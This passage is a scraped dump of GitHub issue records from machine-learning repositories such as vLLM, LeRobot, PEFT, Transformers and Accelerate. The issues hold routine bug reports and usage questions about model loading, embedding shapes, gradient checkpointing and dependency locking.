http_request_size_bytes_created Content length of incoming requests by handler. Only value of header is respected. Otherwise ignored. No percentile calculated. \n# TYPE http_request_size_bytes_created gauge\nhttp_request_size_bytes_created{handler=\"none\"} 1.7604160309442668e+09\n# HELP http_response_size_bytes Content length of outgoing responses by handler. Only value of header is respected. Otherwise ignored. No percentile calculated. \n# TYPE http_response_size_bytes summary\nhttp_response_size_bytes_count{handler=\"none\"} 1.0\nhttp_response_size_bytes_sum{handler=\"none\"} 22.0\n# HELP http_response_size_bytes_created Content length of outgoing responses by handler. Only value of header is respected. Otherwise ignored. No percentile calculated. \n# TYPE http_response_size_bytes_created gauge\nhttp_response_size_bytes_created{handler=\"none\"} 1.7604160309445088e+09\n# HELP http_request_duration_highr_seconds Latency with many buckets but no API specific labels. Made for more accurate percentile calculations. \n# TYPE http_request_duration_highr_seconds histogram\nhttp_request_duration_highr_seconds_bucket{le=\"0.01\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"0.025\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"0.05\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"0.075\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"0.1\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"0.25\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"0.5\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"0.75\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"1.0\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"1.5\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"2.0\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"2.5\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"3.0\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"3.5\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"4.0\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"4.5\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"5.0\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"7.5\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"10.0\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"30.0\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"60.0\"} 1.0\nhttp_request_duration_highr_se", "url": "https://github.com/vllm-project/vllm/issues/26762", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-14T05:13:30Z", "updated_at": "2025-10-14T05:13:30Z", "comments": 0, "user": "Renoshen" }, { "repo": "huggingface/lerobot", "number": 2194, "title": "During training with PI0, the loss is very low. Is this normal, and is the training proceeding correctly?", "body": "I am currently training with PI05.\n\n\"Image\"\n\n`INFO 2025-10-14 04:57:11 ot_train.py:299 step:10 smpl:320 ep:0 epch:0.00 loss:0.468 grdn:3.522 lr:1.6e-07 updt_s:4.906 data_s:4.874 INFO 2025-10-14 04:57:59 ot_train.py:299 step:20 smpl:640 ep:0 epch:0.00 loss:0.467 grdn:3.936 lr:4.1e-07 updt_s:4.807 data_s:0.008 INFO 2025-10-14 04:58:48 ot_train.py:299 step:30 smpl:960 ep:0 epch:0.01 loss:0.508 grdn:3.973 lr:6.6e-07 updt_s:4.815 data_s:0.009 INFO 2025-10-14 04:59:36 ot_train.py:299 step:40 smpl:1K ep:1 epch:0.01 loss:0.513 grdn:3.805 lr:9.1e-07 updt_s:4.841 data_s:0.009`\n\nThe loss is very low right from the start of training. Is it training normally?", "url": "https://github.com/huggingface/lerobot/issues/2194", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-10-14T05:04:31Z", "updated_at": "2025-10-14T08:19:29Z", "user": "pparkgyuhyeon" }, { "repo": "huggingface/peft", "number": 2832, "title": "Gradient checkpoint with multiple adapters", "body": "I'm not sure if it can be considered as a bug since I might be using the library differently from how it's supposed to be used.\n\n\n**Context:**\n\n I have a PeftModel that need to be infered with 2 different inputs.\nFor each input I have a pretrained adapter that is frozen and a new adapter for finetuning.\n\nMy forward does:\n```\nfor name, x in inputs:\n mypeft_model.base_model.set_adapter([name+'pretrain',name+'ft'])\n custom_set_pretrain_grad_false_ft_true() #Doing it because set_adapter force gradients to True cf 2759#issue-3363985341\n feature = mypeft_model(x)\n```\n (https://github.com/huggingface/peft/issues/2759#issue-3363985341)\n**Issue:**\n1) if mypeft_model contains cp.checkpoint(mymodule, x), the backpropagation will not update properly the weight of the LoRA layers in my module either because it did not 'see the set_adapter' or it did not 'see the force grad'\n2) A work around I have found is to wrap the whole code inside the loop with a cp.checkpoint but it's super heavy on the memory as I have to store all in GPU until the end of the backbone (ViT-G 40 blocks transformers)\n\n**Question:**\nIs there anyway to 'provide' the context to the backpropagation even using gradient checkpointing when switching adapters in the forward?\nI have not explored huggingface transformers.enable_gradient_checkpointing() since I'm using a custom model and I'm unsure if it fits for my problem.\n", "url": "https://github.com/huggingface/peft/issues/2832", "state": "closed", "labels": [], "created_at": "2025-10-14T03:53:10Z", "updated_at": "2025-12-15T08:24:03Z", "comments": 3, "user": "NguyenRichard" }, { "repo": "huggingface/lerobot", "number": 2192, "title": "how to test PI0's output", "body": "i use this code to test pi0's output:\n\ndef main():\n # Create a directory to store the training checkpoint.\n output_directory = Path(\"outputs/example_aloha_static_coffee\")\n output_directory.mkdir(parents=True, exist_ok=True)\n\n # # Select your device\n device = torch.device(\"cuda\")\n\n # Number of offline training steps (we'll only do offline training for this example.)\n # Adjust as you prefer. 5000 steps are needed to get something worth evaluating.\n training_steps = 500\n log_freq = 1\n\n # When starting from scratch (i.e. not from a pretrained policy), we need to specify 2 things before\n # creating the policy:\n # - input/output shapes: to properly size the policy\n # - dataset stats: for normalization and denormalization of input/outputs\n dataset_metadata = LeRobotDatasetMetadata(\"lerobot/aloha_static_coffee\")\n print(dataset_metadata.features.keys())\n features = dataset_to_policy_features(dataset_metadata.features)\n output_features = {key: ft for key, ft in features.items() if ft.type is FeatureType.ACTION}\n input_features = {key: ft for key, ft in features.items() if key not in output_features}\n\n # Policies are initialized with a configuration class, in this case `PI0Config`. For this example,\n # we'll just use the defaults and so no arguments other than input/output features need to be passed.\n cfg = PI0Config(input_features=input_features, output_features=output_features)\n print(cfg)\n\n # We can now instantiate our policy with this config and the dataset stats.\n policy = PI0Policy(cfg)\n policy.train()\n policy.to(device)\n preprocessor, postprocessor = make_pre_post_processors(cfg, dataset_stats=dataset_metadata.stats)\n\n # We can then instantiate the dataset with these delta_timestamps configuration.\n dataset = LeRobotDataset(\"lerobot/aloha_static_coffee\")\n\n # \u53d6\u4e00\u6761\u6570\u636e\u8fdb\u884c\u8bd5\u9a8c\n state = dataset[20][\"observation.state\"]\n image_cam_high = dataset[20][\"observation.images.cam_high\"]\n image_cam_left_wrist = dataset[20][\"observation.images.cam_left_wrist\"]\n image_cam_low = dataset[20][\"observation.images.cam_low\"]\n image_cam_right_wrist = dataset[20][\"observation.images.cam_right_wrist\"]\n effort = dataset[20][\"observation.effort\"]\n state = state.unsqueeze(0).to(device)\n image_cam_high = image_cam_high.unsqueeze(0).to(device)\n image_cam_left_wrist = image_cam_left_wrist.unsqueeze(0).to(device)\n image_cam_low = image_cam_low.unsqueeze(0).to(device)\n image_cam_right_wrist = image_cam_right_wrist.unsqueeze(0).to(device)\n effort = effort.unsqueeze(0).to(device)\n print(\"State size: \", state.size())\n print(\"Image size: \", image_cam_high.size())\n print(\"Effort size: \", effort.size())\n observation = {\n \"observation.state\": state,\n \"observation.images.cam_high\": image_cam_high,\n \"observation.images.cam_left_wrist\": image_cam_left_wrist,\n \"observation.images.cam_low\": image_cam_low,\n \"observation.images.cam_right_wrist\": image_cam_right_wrist,\n \"observation.effort\": effort,\n }\n\n # \u8f93\u51faaction\n with torch.inference_mode():\n action = policy.select_action(observation)\n numpy_action = action.squeeze(0).to(\"cpu\").numpy()\n print(\"Action: \", numpy_action)\n\n\nbut got an error:\n\nTraceback (most recent call last):\n File \"/home/wjg/trainpi0.py\", line 140, in \n main()\n File \"/home/wjg/trainpi0.py\", line 129, in main\n action = policy.select_action(observation)\n File \"/data/wjg_files/anaconda3/envs/lerobot/lib/python3.10/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n File \"/data/wjg_files/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 1144, in select_action\n actions = self.predict_action_chunk(batch)[:, : self.config.n_action_steps]\n File \"/data/wjg_files/anaconda3/envs/lerobot/lib/python3.10/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n File \"/data/wjg_files/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 1157, in predict_action_chunk\n lang_tokens, lang_masks = batch[f\"{OBS_LANGUAGE_TOKENS}\"], batch[f\"{OBS_LANGUAGE_ATTENTION_MASK}\"]\nKeyError: 'observation.language.tokens'\n\nhow to solve it?", "url": "https://github.com/huggingface/lerobot/issues/2192", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-10-14T03:36:43Z", "updated_at": "2025-10-17T09:56:46Z", "user": "Addog666" }, { "repo": "vllm-project/vllm", "number": 26749, "title": "[Bug]: InternVL: passing image embeddings triggers TypeError: can only concatenate tuple (not \"Tensor\") to tuple in get_multimodal_embeddings, and v1 sanity check then expects a sequence of 2D tensors", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\n# Title\nInternVL: passing image **embeddings** triggers `TypeError: can only concatenate tuple (not \"Tensor\") to tuple` in `get_multimodal_embeddings`, and v1 sanity check then expects a sequence of 2D tensors\n\n## Environment\n- vLLM: 0.10.2 (also reproducible on 0.10.1)\n- Python: 3.11.x\n- Model: `InternVL3_5-1B` (HF, `trust_remote_code=True`)\n\n## Minimal Repro (image **embeddings** input)\n```python\nfrom vllm import LLM\nimport torch\n\nllm = LLM(model=\"InternVL3_5-1B\", trust_remote_code=True)\n\nprompt = \"USER: \\nWhat is this image?\\nASSISTANT:\"\n\n# 3D embeddings: [B, T, H] just to illustrate the bug (B=1 here)\n# H equals the LM hidden_size for the given weight; using 1024 to reproduce.\nimage_embeds = torch.randn(1, 16, 1024)\n\nout = llm.generate({\n \"prompt\": prompt,\n \"multi_modal_data\": {\"image\": image_embeds}, # or {\"images\": image_embeds}\n})\nprint(out[0].outputs[0].text)\n```\n\n## Actual Behavior / Stack\nOn 0.10.2:\n\n```\nFile \".../vllm/model_executor/models/internvl.py\", line 1328, in get_multimodal_embeddings\n multimodal_embeddings += vision_embeddings\nTypeError: can only concatenate tuple (not \"Tensor\") to tuple\n```\n\nIf we monkey-patch around the above concat, the engine soon asserts:\n\n```\nvllm/v1/worker/utils.py\", line 155, in sanity_check_mm_encoder_outputs\nAssertionError: Expected multimodal embeddings to be a sequence of 2D tensors,\nbut got tensors with shapes [torch.Size([1, 16, 1024])] instead.\nThis is most likely due to incorrect implementation of the model's `get_multimodal_embeddings` method.\n```\n\nSo there are **two inconsistencies**:\n1) `get_multimodal_embeddings` sometimes returns a **Tensor** (3D) but the code path later concatenates assuming a **tuple** of tensors. \n2) v1 expects a **sequence of 2D tensors `[T, H]`**, but the current image-embeddings path can yield a **3D** `[B, T, H]` tensor (batch dimension not flattened), which fails the sanity check.\n\n## Expected Behavior\n- Passing embeddings should **not crash**, whether provided as:\n - a single 2D tensor `[T, H]` (one image), or\n - a 3D tensor `[B, T, H]` (batch of images), or\n - a list/tuple of 2D tensors. \n- `get_multimodal_embeddings` should normalize its outputs to a **sequence of 2D tensors** to satisfy `sanity_check_mm_encoder_outputs`.\n\n## Why this matters\nInternVL supports both pixel inputs and precomputed **embeddings**. The embedding path is useful in production pipelines (pre-encode vision on different hardware, caching, etc.). Currently in 0.10.1/0.10.2 this path is broken due to type/shape inconsistencies, blocking these use-cases.\n\n## Proposed Fix (minimal)\nNormalize to a sequence of 2D tensors before concatenation. For example, in `vllm/model_executor/models/internvl.py` inside `get_multimodal_embeddings(...)`:\n\n```diff\n@@\n- vision_embeddings = self._process_image_input(image_input)\n- if torch.is_tensor(vision_embeddings):\n- vision_embeddings = (vision_embeddings,)\n- multimodal_embeddings += vision_embeddings\n+ vision_embeddings = self._process_image_input(image_input)\n+\n+ # Normalize to tuple[Tensor[T,H], ...]\n+ def _to_2d_seq(x):\n+ import torch\n+ if torch.is_tensor(x):\n+ if x.ndim == 3: # [B, T, H] -> B * [T,H]\n+ return tuple(x.unbind(0))\n+ elif x.ndim == 2: # [T, H]\n+ return (x,)\n+ raise TypeError(f\"vision embeddings must be 2D/3D, got shape {tuple(x.shape)}\")\n+ elif isinstance(x, (list, tuple)):\n+ out = []\n+ for e in x:\n+ out.extend(_to_2d_seq(e))\n+ return tuple(out)\n+ else:\n+ raise TypeError(f\"unexpected type for vision embeddings: {type(x)}\")\n+\n+ vision_embeddings = _to_2d_seq(vision_embeddings)\n+ multimodal_embeddings += vision_embeddings\n```\n\nAdditionally, consider accepting both `\"image\"` and `\"images\"` as modality keys (a few code paths assume `\"images\"`), or clarify in docs which key is canonical.\n\n## Workarounds we tried\n- Wrapping the returned tensor into a tuple (avoids the first `TypeError`), but the v1 sanity check still fails because the output remains 3D.\n- Providing embeddings as a list of 2D tensors `[T, H]` works, but many upstream encoders naturally produce `[B, T, H]`, so normalizing in the model executor is safer.\n- Pixel input path works and can be used as a temporary fallback, but defeats the purpose of passing precomputed embeddings.\n\n## Version Matrix\n- \u2705 Pixel input: OK on 0.10.1 and 0.10.2 \n- \u274c Embedding input: crashe", "url": "https://github.com/vllm-project/vllm/issues/26749", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-14T03:01:33Z", "updated_at": "2025-10-14T09:36:22Z", "comments": 1, "user": "BlueBlueFF" }, { "repo": "huggingface/transformers", "number": 41554, "title": "model.from_pretrained( . . . ) not loading needed weights/parameters", "body": "I am performing quantization of a PatchTSTForPrediction model and attempting to load a saved quantized model for testing. Model is saved using `model.save_pretrained( . . . )`. Testing proceeds perfectly once performed immediately after QAT (Hugging face trainer's handles loading at the end of training); however, when attempting to load a saved quantized (trained) model, the error below occurs. I perform all the pre-quantization preparation so that the model contains all the necessary parameters (untrained) and then try to load the saved checkpoint. How can I force `from_pretrained( . . . )` to load ALL required weights? \n\n`Some weights of the model checkpoint at ./checkpoints/ . . . were not used when initializing PatchTSTForPrediction: ['head.projection.calib_counter', 'head.projection.num_module_called', 'head.projection.obsrv_clipval', 'head.projection.obsrv_clipvaln', 'head.projection.obsrv_w_clipval', 'head.projection.quantize_feature.clip_val', 'head.projection.quantize_feature.clip_valn', 'head.projection.quantize_weight.clip_val', 'model.encoder.layers.0.ff.0.calib_counter', 'model.encoder.layers.0.ff.0.num_module_called', 'model.encoder.layers.0.ff.0.obsrv_clipval', 'model.encoder.layers.0.ff.0.obsrv_clipvaln', 'model.encoder.layers.0.ff.0.obsrv_w_clipval', 'model.encoder.layers.0.ff.0.quantize_feature.clip_val', 'model.encoder.layers.0.ff.0.quantize_feature.clip_valn', 'model.encoder.layers.0.ff.0.quantize_weight.clip_val', 'model.encoder.layers.0.ff.3.calib_counter', 'model.encoder.layers.0.ff.3.num_module_called', 'model.encoder.layers.0.ff.3.obsrv_clipval', 'model.encoder.layers.0.ff.3.obsrv_clipvaln', 'model.encoder.layers.0.ff.3.obsrv_w_clipval', 'model.encoder.layers.0.ff.3.quantize_feature.clip_val', 'model.encoder.layers.0.ff.3.quantize_feature.clip_valn', 'model.encoder.layers.0.ff.3.quantize_weight.clip_val', 'model.encoder.layers.0.self_attn.QBmm52.num_module_called', 'model.encoder.layers.0.self_attn.QBmm52.quantize_m1.clip_val', 'model.encoder.layers.0.self_attn.QBmm52.quantize_m1.clip_valn', 'model.encoder.layers.0.self_attn.QBmm52.quantize_m2.clip_val', 'model.encoder.layers.0.self_attn.QBmm52.quantize_m2.clip_valn', 'model.encoder.layers.0.self_attn.QBmm62.num_module_called', 'model.encoder.layers.0.self_attn.QBmm62.quantize_m1.clip_val', 'model.encoder.layers.0.self_attn.QBmm62.quantize_m1.clip_valn', 'model.encoder.layers.0.self_attn.QBmm62.quantize_m2.clip_val', 'model.encoder.layers.0.self_attn.QBmm62.quantize_m2.clip_valn', 'model.encoder.layers.0.self_attn.k_proj.calib_counter', 'model.encoder.layers.0.self_attn.k_proj.num_module_called', 'model.encoder.layers.0.self_attn.k_proj.obsrv_clipval', 'model.encoder.layers.0.self_attn.k_proj.obsrv_clipvaln', 'model.encoder.layers.0.self_attn.k_proj.obsrv_w_clipval', 'model.encoder.layers.0.self_attn.k_proj.quantize_feature.clip_val', 'model.encoder.layers.0.self_attn.k_proj.quantize_feature.clip_valn', 'model.encoder.layers.0.self_attn.k_proj.quantize_weight.clip_val', 'model.encoder.layers.0.self_attn.out_proj.calib_counter', . . .]\n\nThis IS expected if you are initializing PatchTSTForPrediction from the checkpoint of a model trained on another task or with another architecture (e.g. initializing a BertForSequenceClassification model from a BertForPreTraining model).\nThis IS NOT expected if you are initializing PatchTSTForPrediction from the checkpoint of a model that you expect to be exactly identical (initializing a BertForSequenceClassification model from a BertForSequenceClassification model).` \n\nNB: QAT is simulated. Additional parameters are added to the model after qmodel_prep is called and QAT proceeds as normal. I am using IBM's fms-model-optimizer. ", "url": "https://github.com/huggingface/transformers/issues/41554", "state": "closed", "labels": [], "created_at": "2025-10-13T23:20:20Z", "updated_at": "2025-11-24T08:03:05Z", "comments": 5, "user": "lorsonblair" }, { "repo": "huggingface/lerobot", "number": 2186, "title": "how to load pi0?", "body": "i use this code to load pi0:\n\n```python\nfrom lerobot.policies.pi0.modeling_pi0 import PI0Policy\nimport torch\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\npretrained_policy_path = \"lerobot/pi0_libero_base\"\n\npolicy = PI0Policy.from_pretrained(pretrained_policy_path).to(device)\n```\n\nbut throws an error:\n\n```bash\nTraceback (most recent call last):\n File \"/home/wjg/pi0.py\", line 16, in \n policy = PI0Policy.from_pretrained(pretrained_policy_path).to(device)\n File \"/data/wjg_files/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 923, in from_pretrained\n model = cls(config, **kwargs)\n File \"/data/wjg_files/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 872, in __init__\n self.model = PI0Pytorch(config)\n File \"/data/wjg_files/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 513, in __init__\n self.paligemma_with_expert = PaliGemmaWithExpertModel(\n File \"/data/wjg_files/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 337, in __init__\n vlm_config_hf = CONFIG_MAPPING[\"paligemma\"]()\nTypeError: 'NoneType' object is not subscriptable\n```\n\nhow can i load pi0?", "url": "https://github.com/huggingface/lerobot/issues/2186", "state": "closed", "labels": [ "question", "policies", "python" ], "created_at": "2025-10-13T12:24:32Z", "updated_at": "2025-10-17T09:53:02Z", "user": "Addog666" }, { "repo": "huggingface/accelerate", "number": 3812, "title": "RuntimeError during load_state", "body": "### System Info\n\nThis issue is related to [prior issue 3101](https://github.com/huggingface/accelerate/issues/3101), but it hasn\u2019t been fully resolved yet. The current workaround is to avoid using `safetensors`.\n\n@Narsil suggested using [`load_file/save_file`](https://github.com/huggingface/safetensors/issues/657#issuecomment-3396215002). However, I noticed that accelerate currently uses [save_file](https://github.com/huggingface/accelerate/blob/main/src/accelerate/utils/other.py#L373) for saving and use [load_model](https://github.com/huggingface/accelerate/blob/main/src/accelerate/checkpointing.py#L238) for loading.\n\nIs there any known workaround or recommended fix for this inconsistency?\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nPlease see the [prior issue 3101](https://github.com/huggingface/accelerate/issues/3101).\n\n### Expected behavior\n\nPlease see the [prior issue 3101](https://github.com/huggingface/accelerate/issues/3101).", "url": "https://github.com/huggingface/accelerate/issues/3812", "state": "closed", "labels": [], "created_at": "2025-10-13T11:25:17Z", "updated_at": "2025-11-21T15:07:49Z", "comments": 2, "user": "Silverster98" }, { "repo": "huggingface/lerobot", "number": 2185, "title": "Has the lerobot data format been modified after June this year?", "body": "Has the lerobot data format been modified after June this year? The original data can no longer be used.", "url": "https://github.com/huggingface/lerobot/issues/2185", "state": "closed", "labels": [ "question", "dataset" ], "created_at": "2025-10-13T10:07:41Z", "updated_at": "2025-10-14T08:05:04Z", "user": "Addog666" }, { "repo": "huggingface/transformers", "number": 41539, "title": "All POETRY operations fail on latest version 4.57.0", "body": "### System Info\n\nI import transformers (always latest) in my poetry project.\nI use poetry 2.1.2\n\nAfter this transformers release (4.57.0) I regenerated the poetry lock with command: `poetry lock`\n\nThen when retrying to generate the lock again after other updates - it fails with message:\n\n`Could not parse constrains version: `\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nDoing a simple search in the poetry.lock file I found out that transformers latest package needs `optax ()`\nwhich produces this failure because poetry does not know how to parse this type of version.\n\nNote I am sure that this is the problem because commenting out the transformers the lock works fine, and also by using 4.56.2 from September it also works fine and that `optax ()` cannot be found in the lock in this case.\n\n### Expected behavior\n\nA developer should be able to use the latest transformers package version with poetry.", "url": "https://github.com/huggingface/transformers/issues/41539", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-13T08:40:49Z", "updated_at": "2025-10-13T14:18:02Z", "comments": 1, "user": "bfuia" }, { "repo": "vllm-project/vllm", "number": 26692, "title": "[Usage]: How to release KVCache?", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 | packaged by conda-forge | (main, Jun 4 2025, 14:45:31) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-5.15.0-25-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration :\nGPU 0: NVIDIA L20\nGPU 1: NVIDIA L20\nGPU 2: NVIDIA L20\nGPU 3: NVIDIA L20\n\nNvidia driver version : 550.127.05\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 128\nOn-line CPU(s) list: 0-127\nVendor ID: GenuineIntel\nModel name: INTEL(R) XEON(R) GOLD 6530\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 32\nSocket(s): 2\nStepping: 2\nCPU max MHz: 4000.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr avx512_fp16 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 3 MiB (64 instances)\nL1i cache: 2 MiB (64 instances)\nL2 cache: 128 MiB (64 instances)\nL3 cache: 320 MiB (2 instances)\nNUMA node(s): 4\nNUMA node0 CPU(s): 0-15,64-79\nNUMA node1 CPU(s): 16-31,80-95\nNUMA node2 CPU(s): 32-47,96-111\nNUMA node3 CPU(s): 48-63,112-127\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced IBRS, IBPB conditional, RSB filling\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] numpy==2.2.6\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cufft-cu12==11.3.3.83\n[pip3] nvidia-cufile-cu12==1.13.1.3\n[pip3] nvidia-curand-cu12==10.3.9.90\n[pip3] nvidia-cusolver-cu12==11.7.3.90\n[pip3", "url": "https://github.com/vllm-project/vllm/issues/26692", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-13T08:28:20Z", "updated_at": "2025-10-13T08:28:20Z", "comments": 0, "user": "shenxf1205" }, { "repo": "huggingface/lerobot", "number": 2184, "title": "How to let an episode realize it has finished the task?", "body": "I have successfully trained my real-world lerobot to do several simple tasks from human demonstrations. Say, push an object from point A to point B. I noticed that after the robot arm has finished the task, it would return to its initial pose (same as the human demonstration) and stay idle for the remainder of the episode, until time finishes.\n\nOf course, if I manually move the cup back to point A from point B before the time finishes, it would attempt to finish the job again. But I just wanted to know if there's any way the episode can finish itself, or at least yield a signal, after the first successful attempt?\n\nI'm using lerobot_record.py with specified policy file path. The policy is act.\n\nThank you", "url": "https://github.com/huggingface/lerobot/issues/2184", "state": "open", "labels": [], "created_at": "2025-10-13T06:27:36Z", "updated_at": "2025-12-22T07:56:00Z", "user": "genkv" }, { "repo": "vllm-project/vllm", "number": 26660, "title": "[Usage]: Is there any way to enable beam search in online inference?", "body": "### Your current environment\n\nIs there any way to enable beam search in the `vllm serve` command? Or beam search is only available in offline inference code?\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26660", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-12T13:55:07Z", "updated_at": "2025-10-17T17:12:45Z", "comments": 1, "user": "tiesanguaixia" }, { "repo": "huggingface/transformers", "number": 41533, "title": "Add_Specifical_tokens and resize_toked_embeddings result in an error", "body": "### System Info\n\nI want to add a few special tokens to my Qwen2.5VL model as separators, and after executing the following code, he received the following error message. I don't know how to solve this problem.\n``` bash\n[rank1]: Traceback (most recent call last):\n[rank1]: RuntimeError: shape '[-1, 151936]' is invalid for input of size 329273399\n[rank0]: Traceback (most recent call last):\n[rank0]: RuntimeError: shape '[-1, 151936]' is invalid for input of size 217038339\n[rank3]: Traceback (most recent call last):\n[rank3]: RuntimeError: shape '[-1, 151936]' is invalid for input of size 116936799\n[rank2]: Traceback (most recent call last):\n[rank2]: RuntimeError: shape '[-1, 151936]' is invalid for input of size 215673318\nTraceback (most recent call last):\nFile \"/home/hk-project-p0022189/tum_yvc3016/miniconda3/envs/qwen2_5-VL/lib/python3.10/site-packages/torch/distributed/elastic/multiprocessing/errors/init.py\", line 355, in wrapper\nraise ChildFailedError(\ntorch.distributed.elastic.multiprocessing.errors.ChildFailedError:\nqwenvl/train/train_livecc.py FAILED\nFailures:\n\nRoot Cause (first observed failure):\nerror_file: \ntraceback : To enable traceback see: https://pytorch.org/docs/stable/elastic/errors.html\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n``` python\nimport os\nimport logging\nimport pathlib\nimport torch\nimport transformers\nimport json\nfrom typing import Dict\nimport shutil\nimport sys\nfrom pathlib import Path\n\nproject_root = 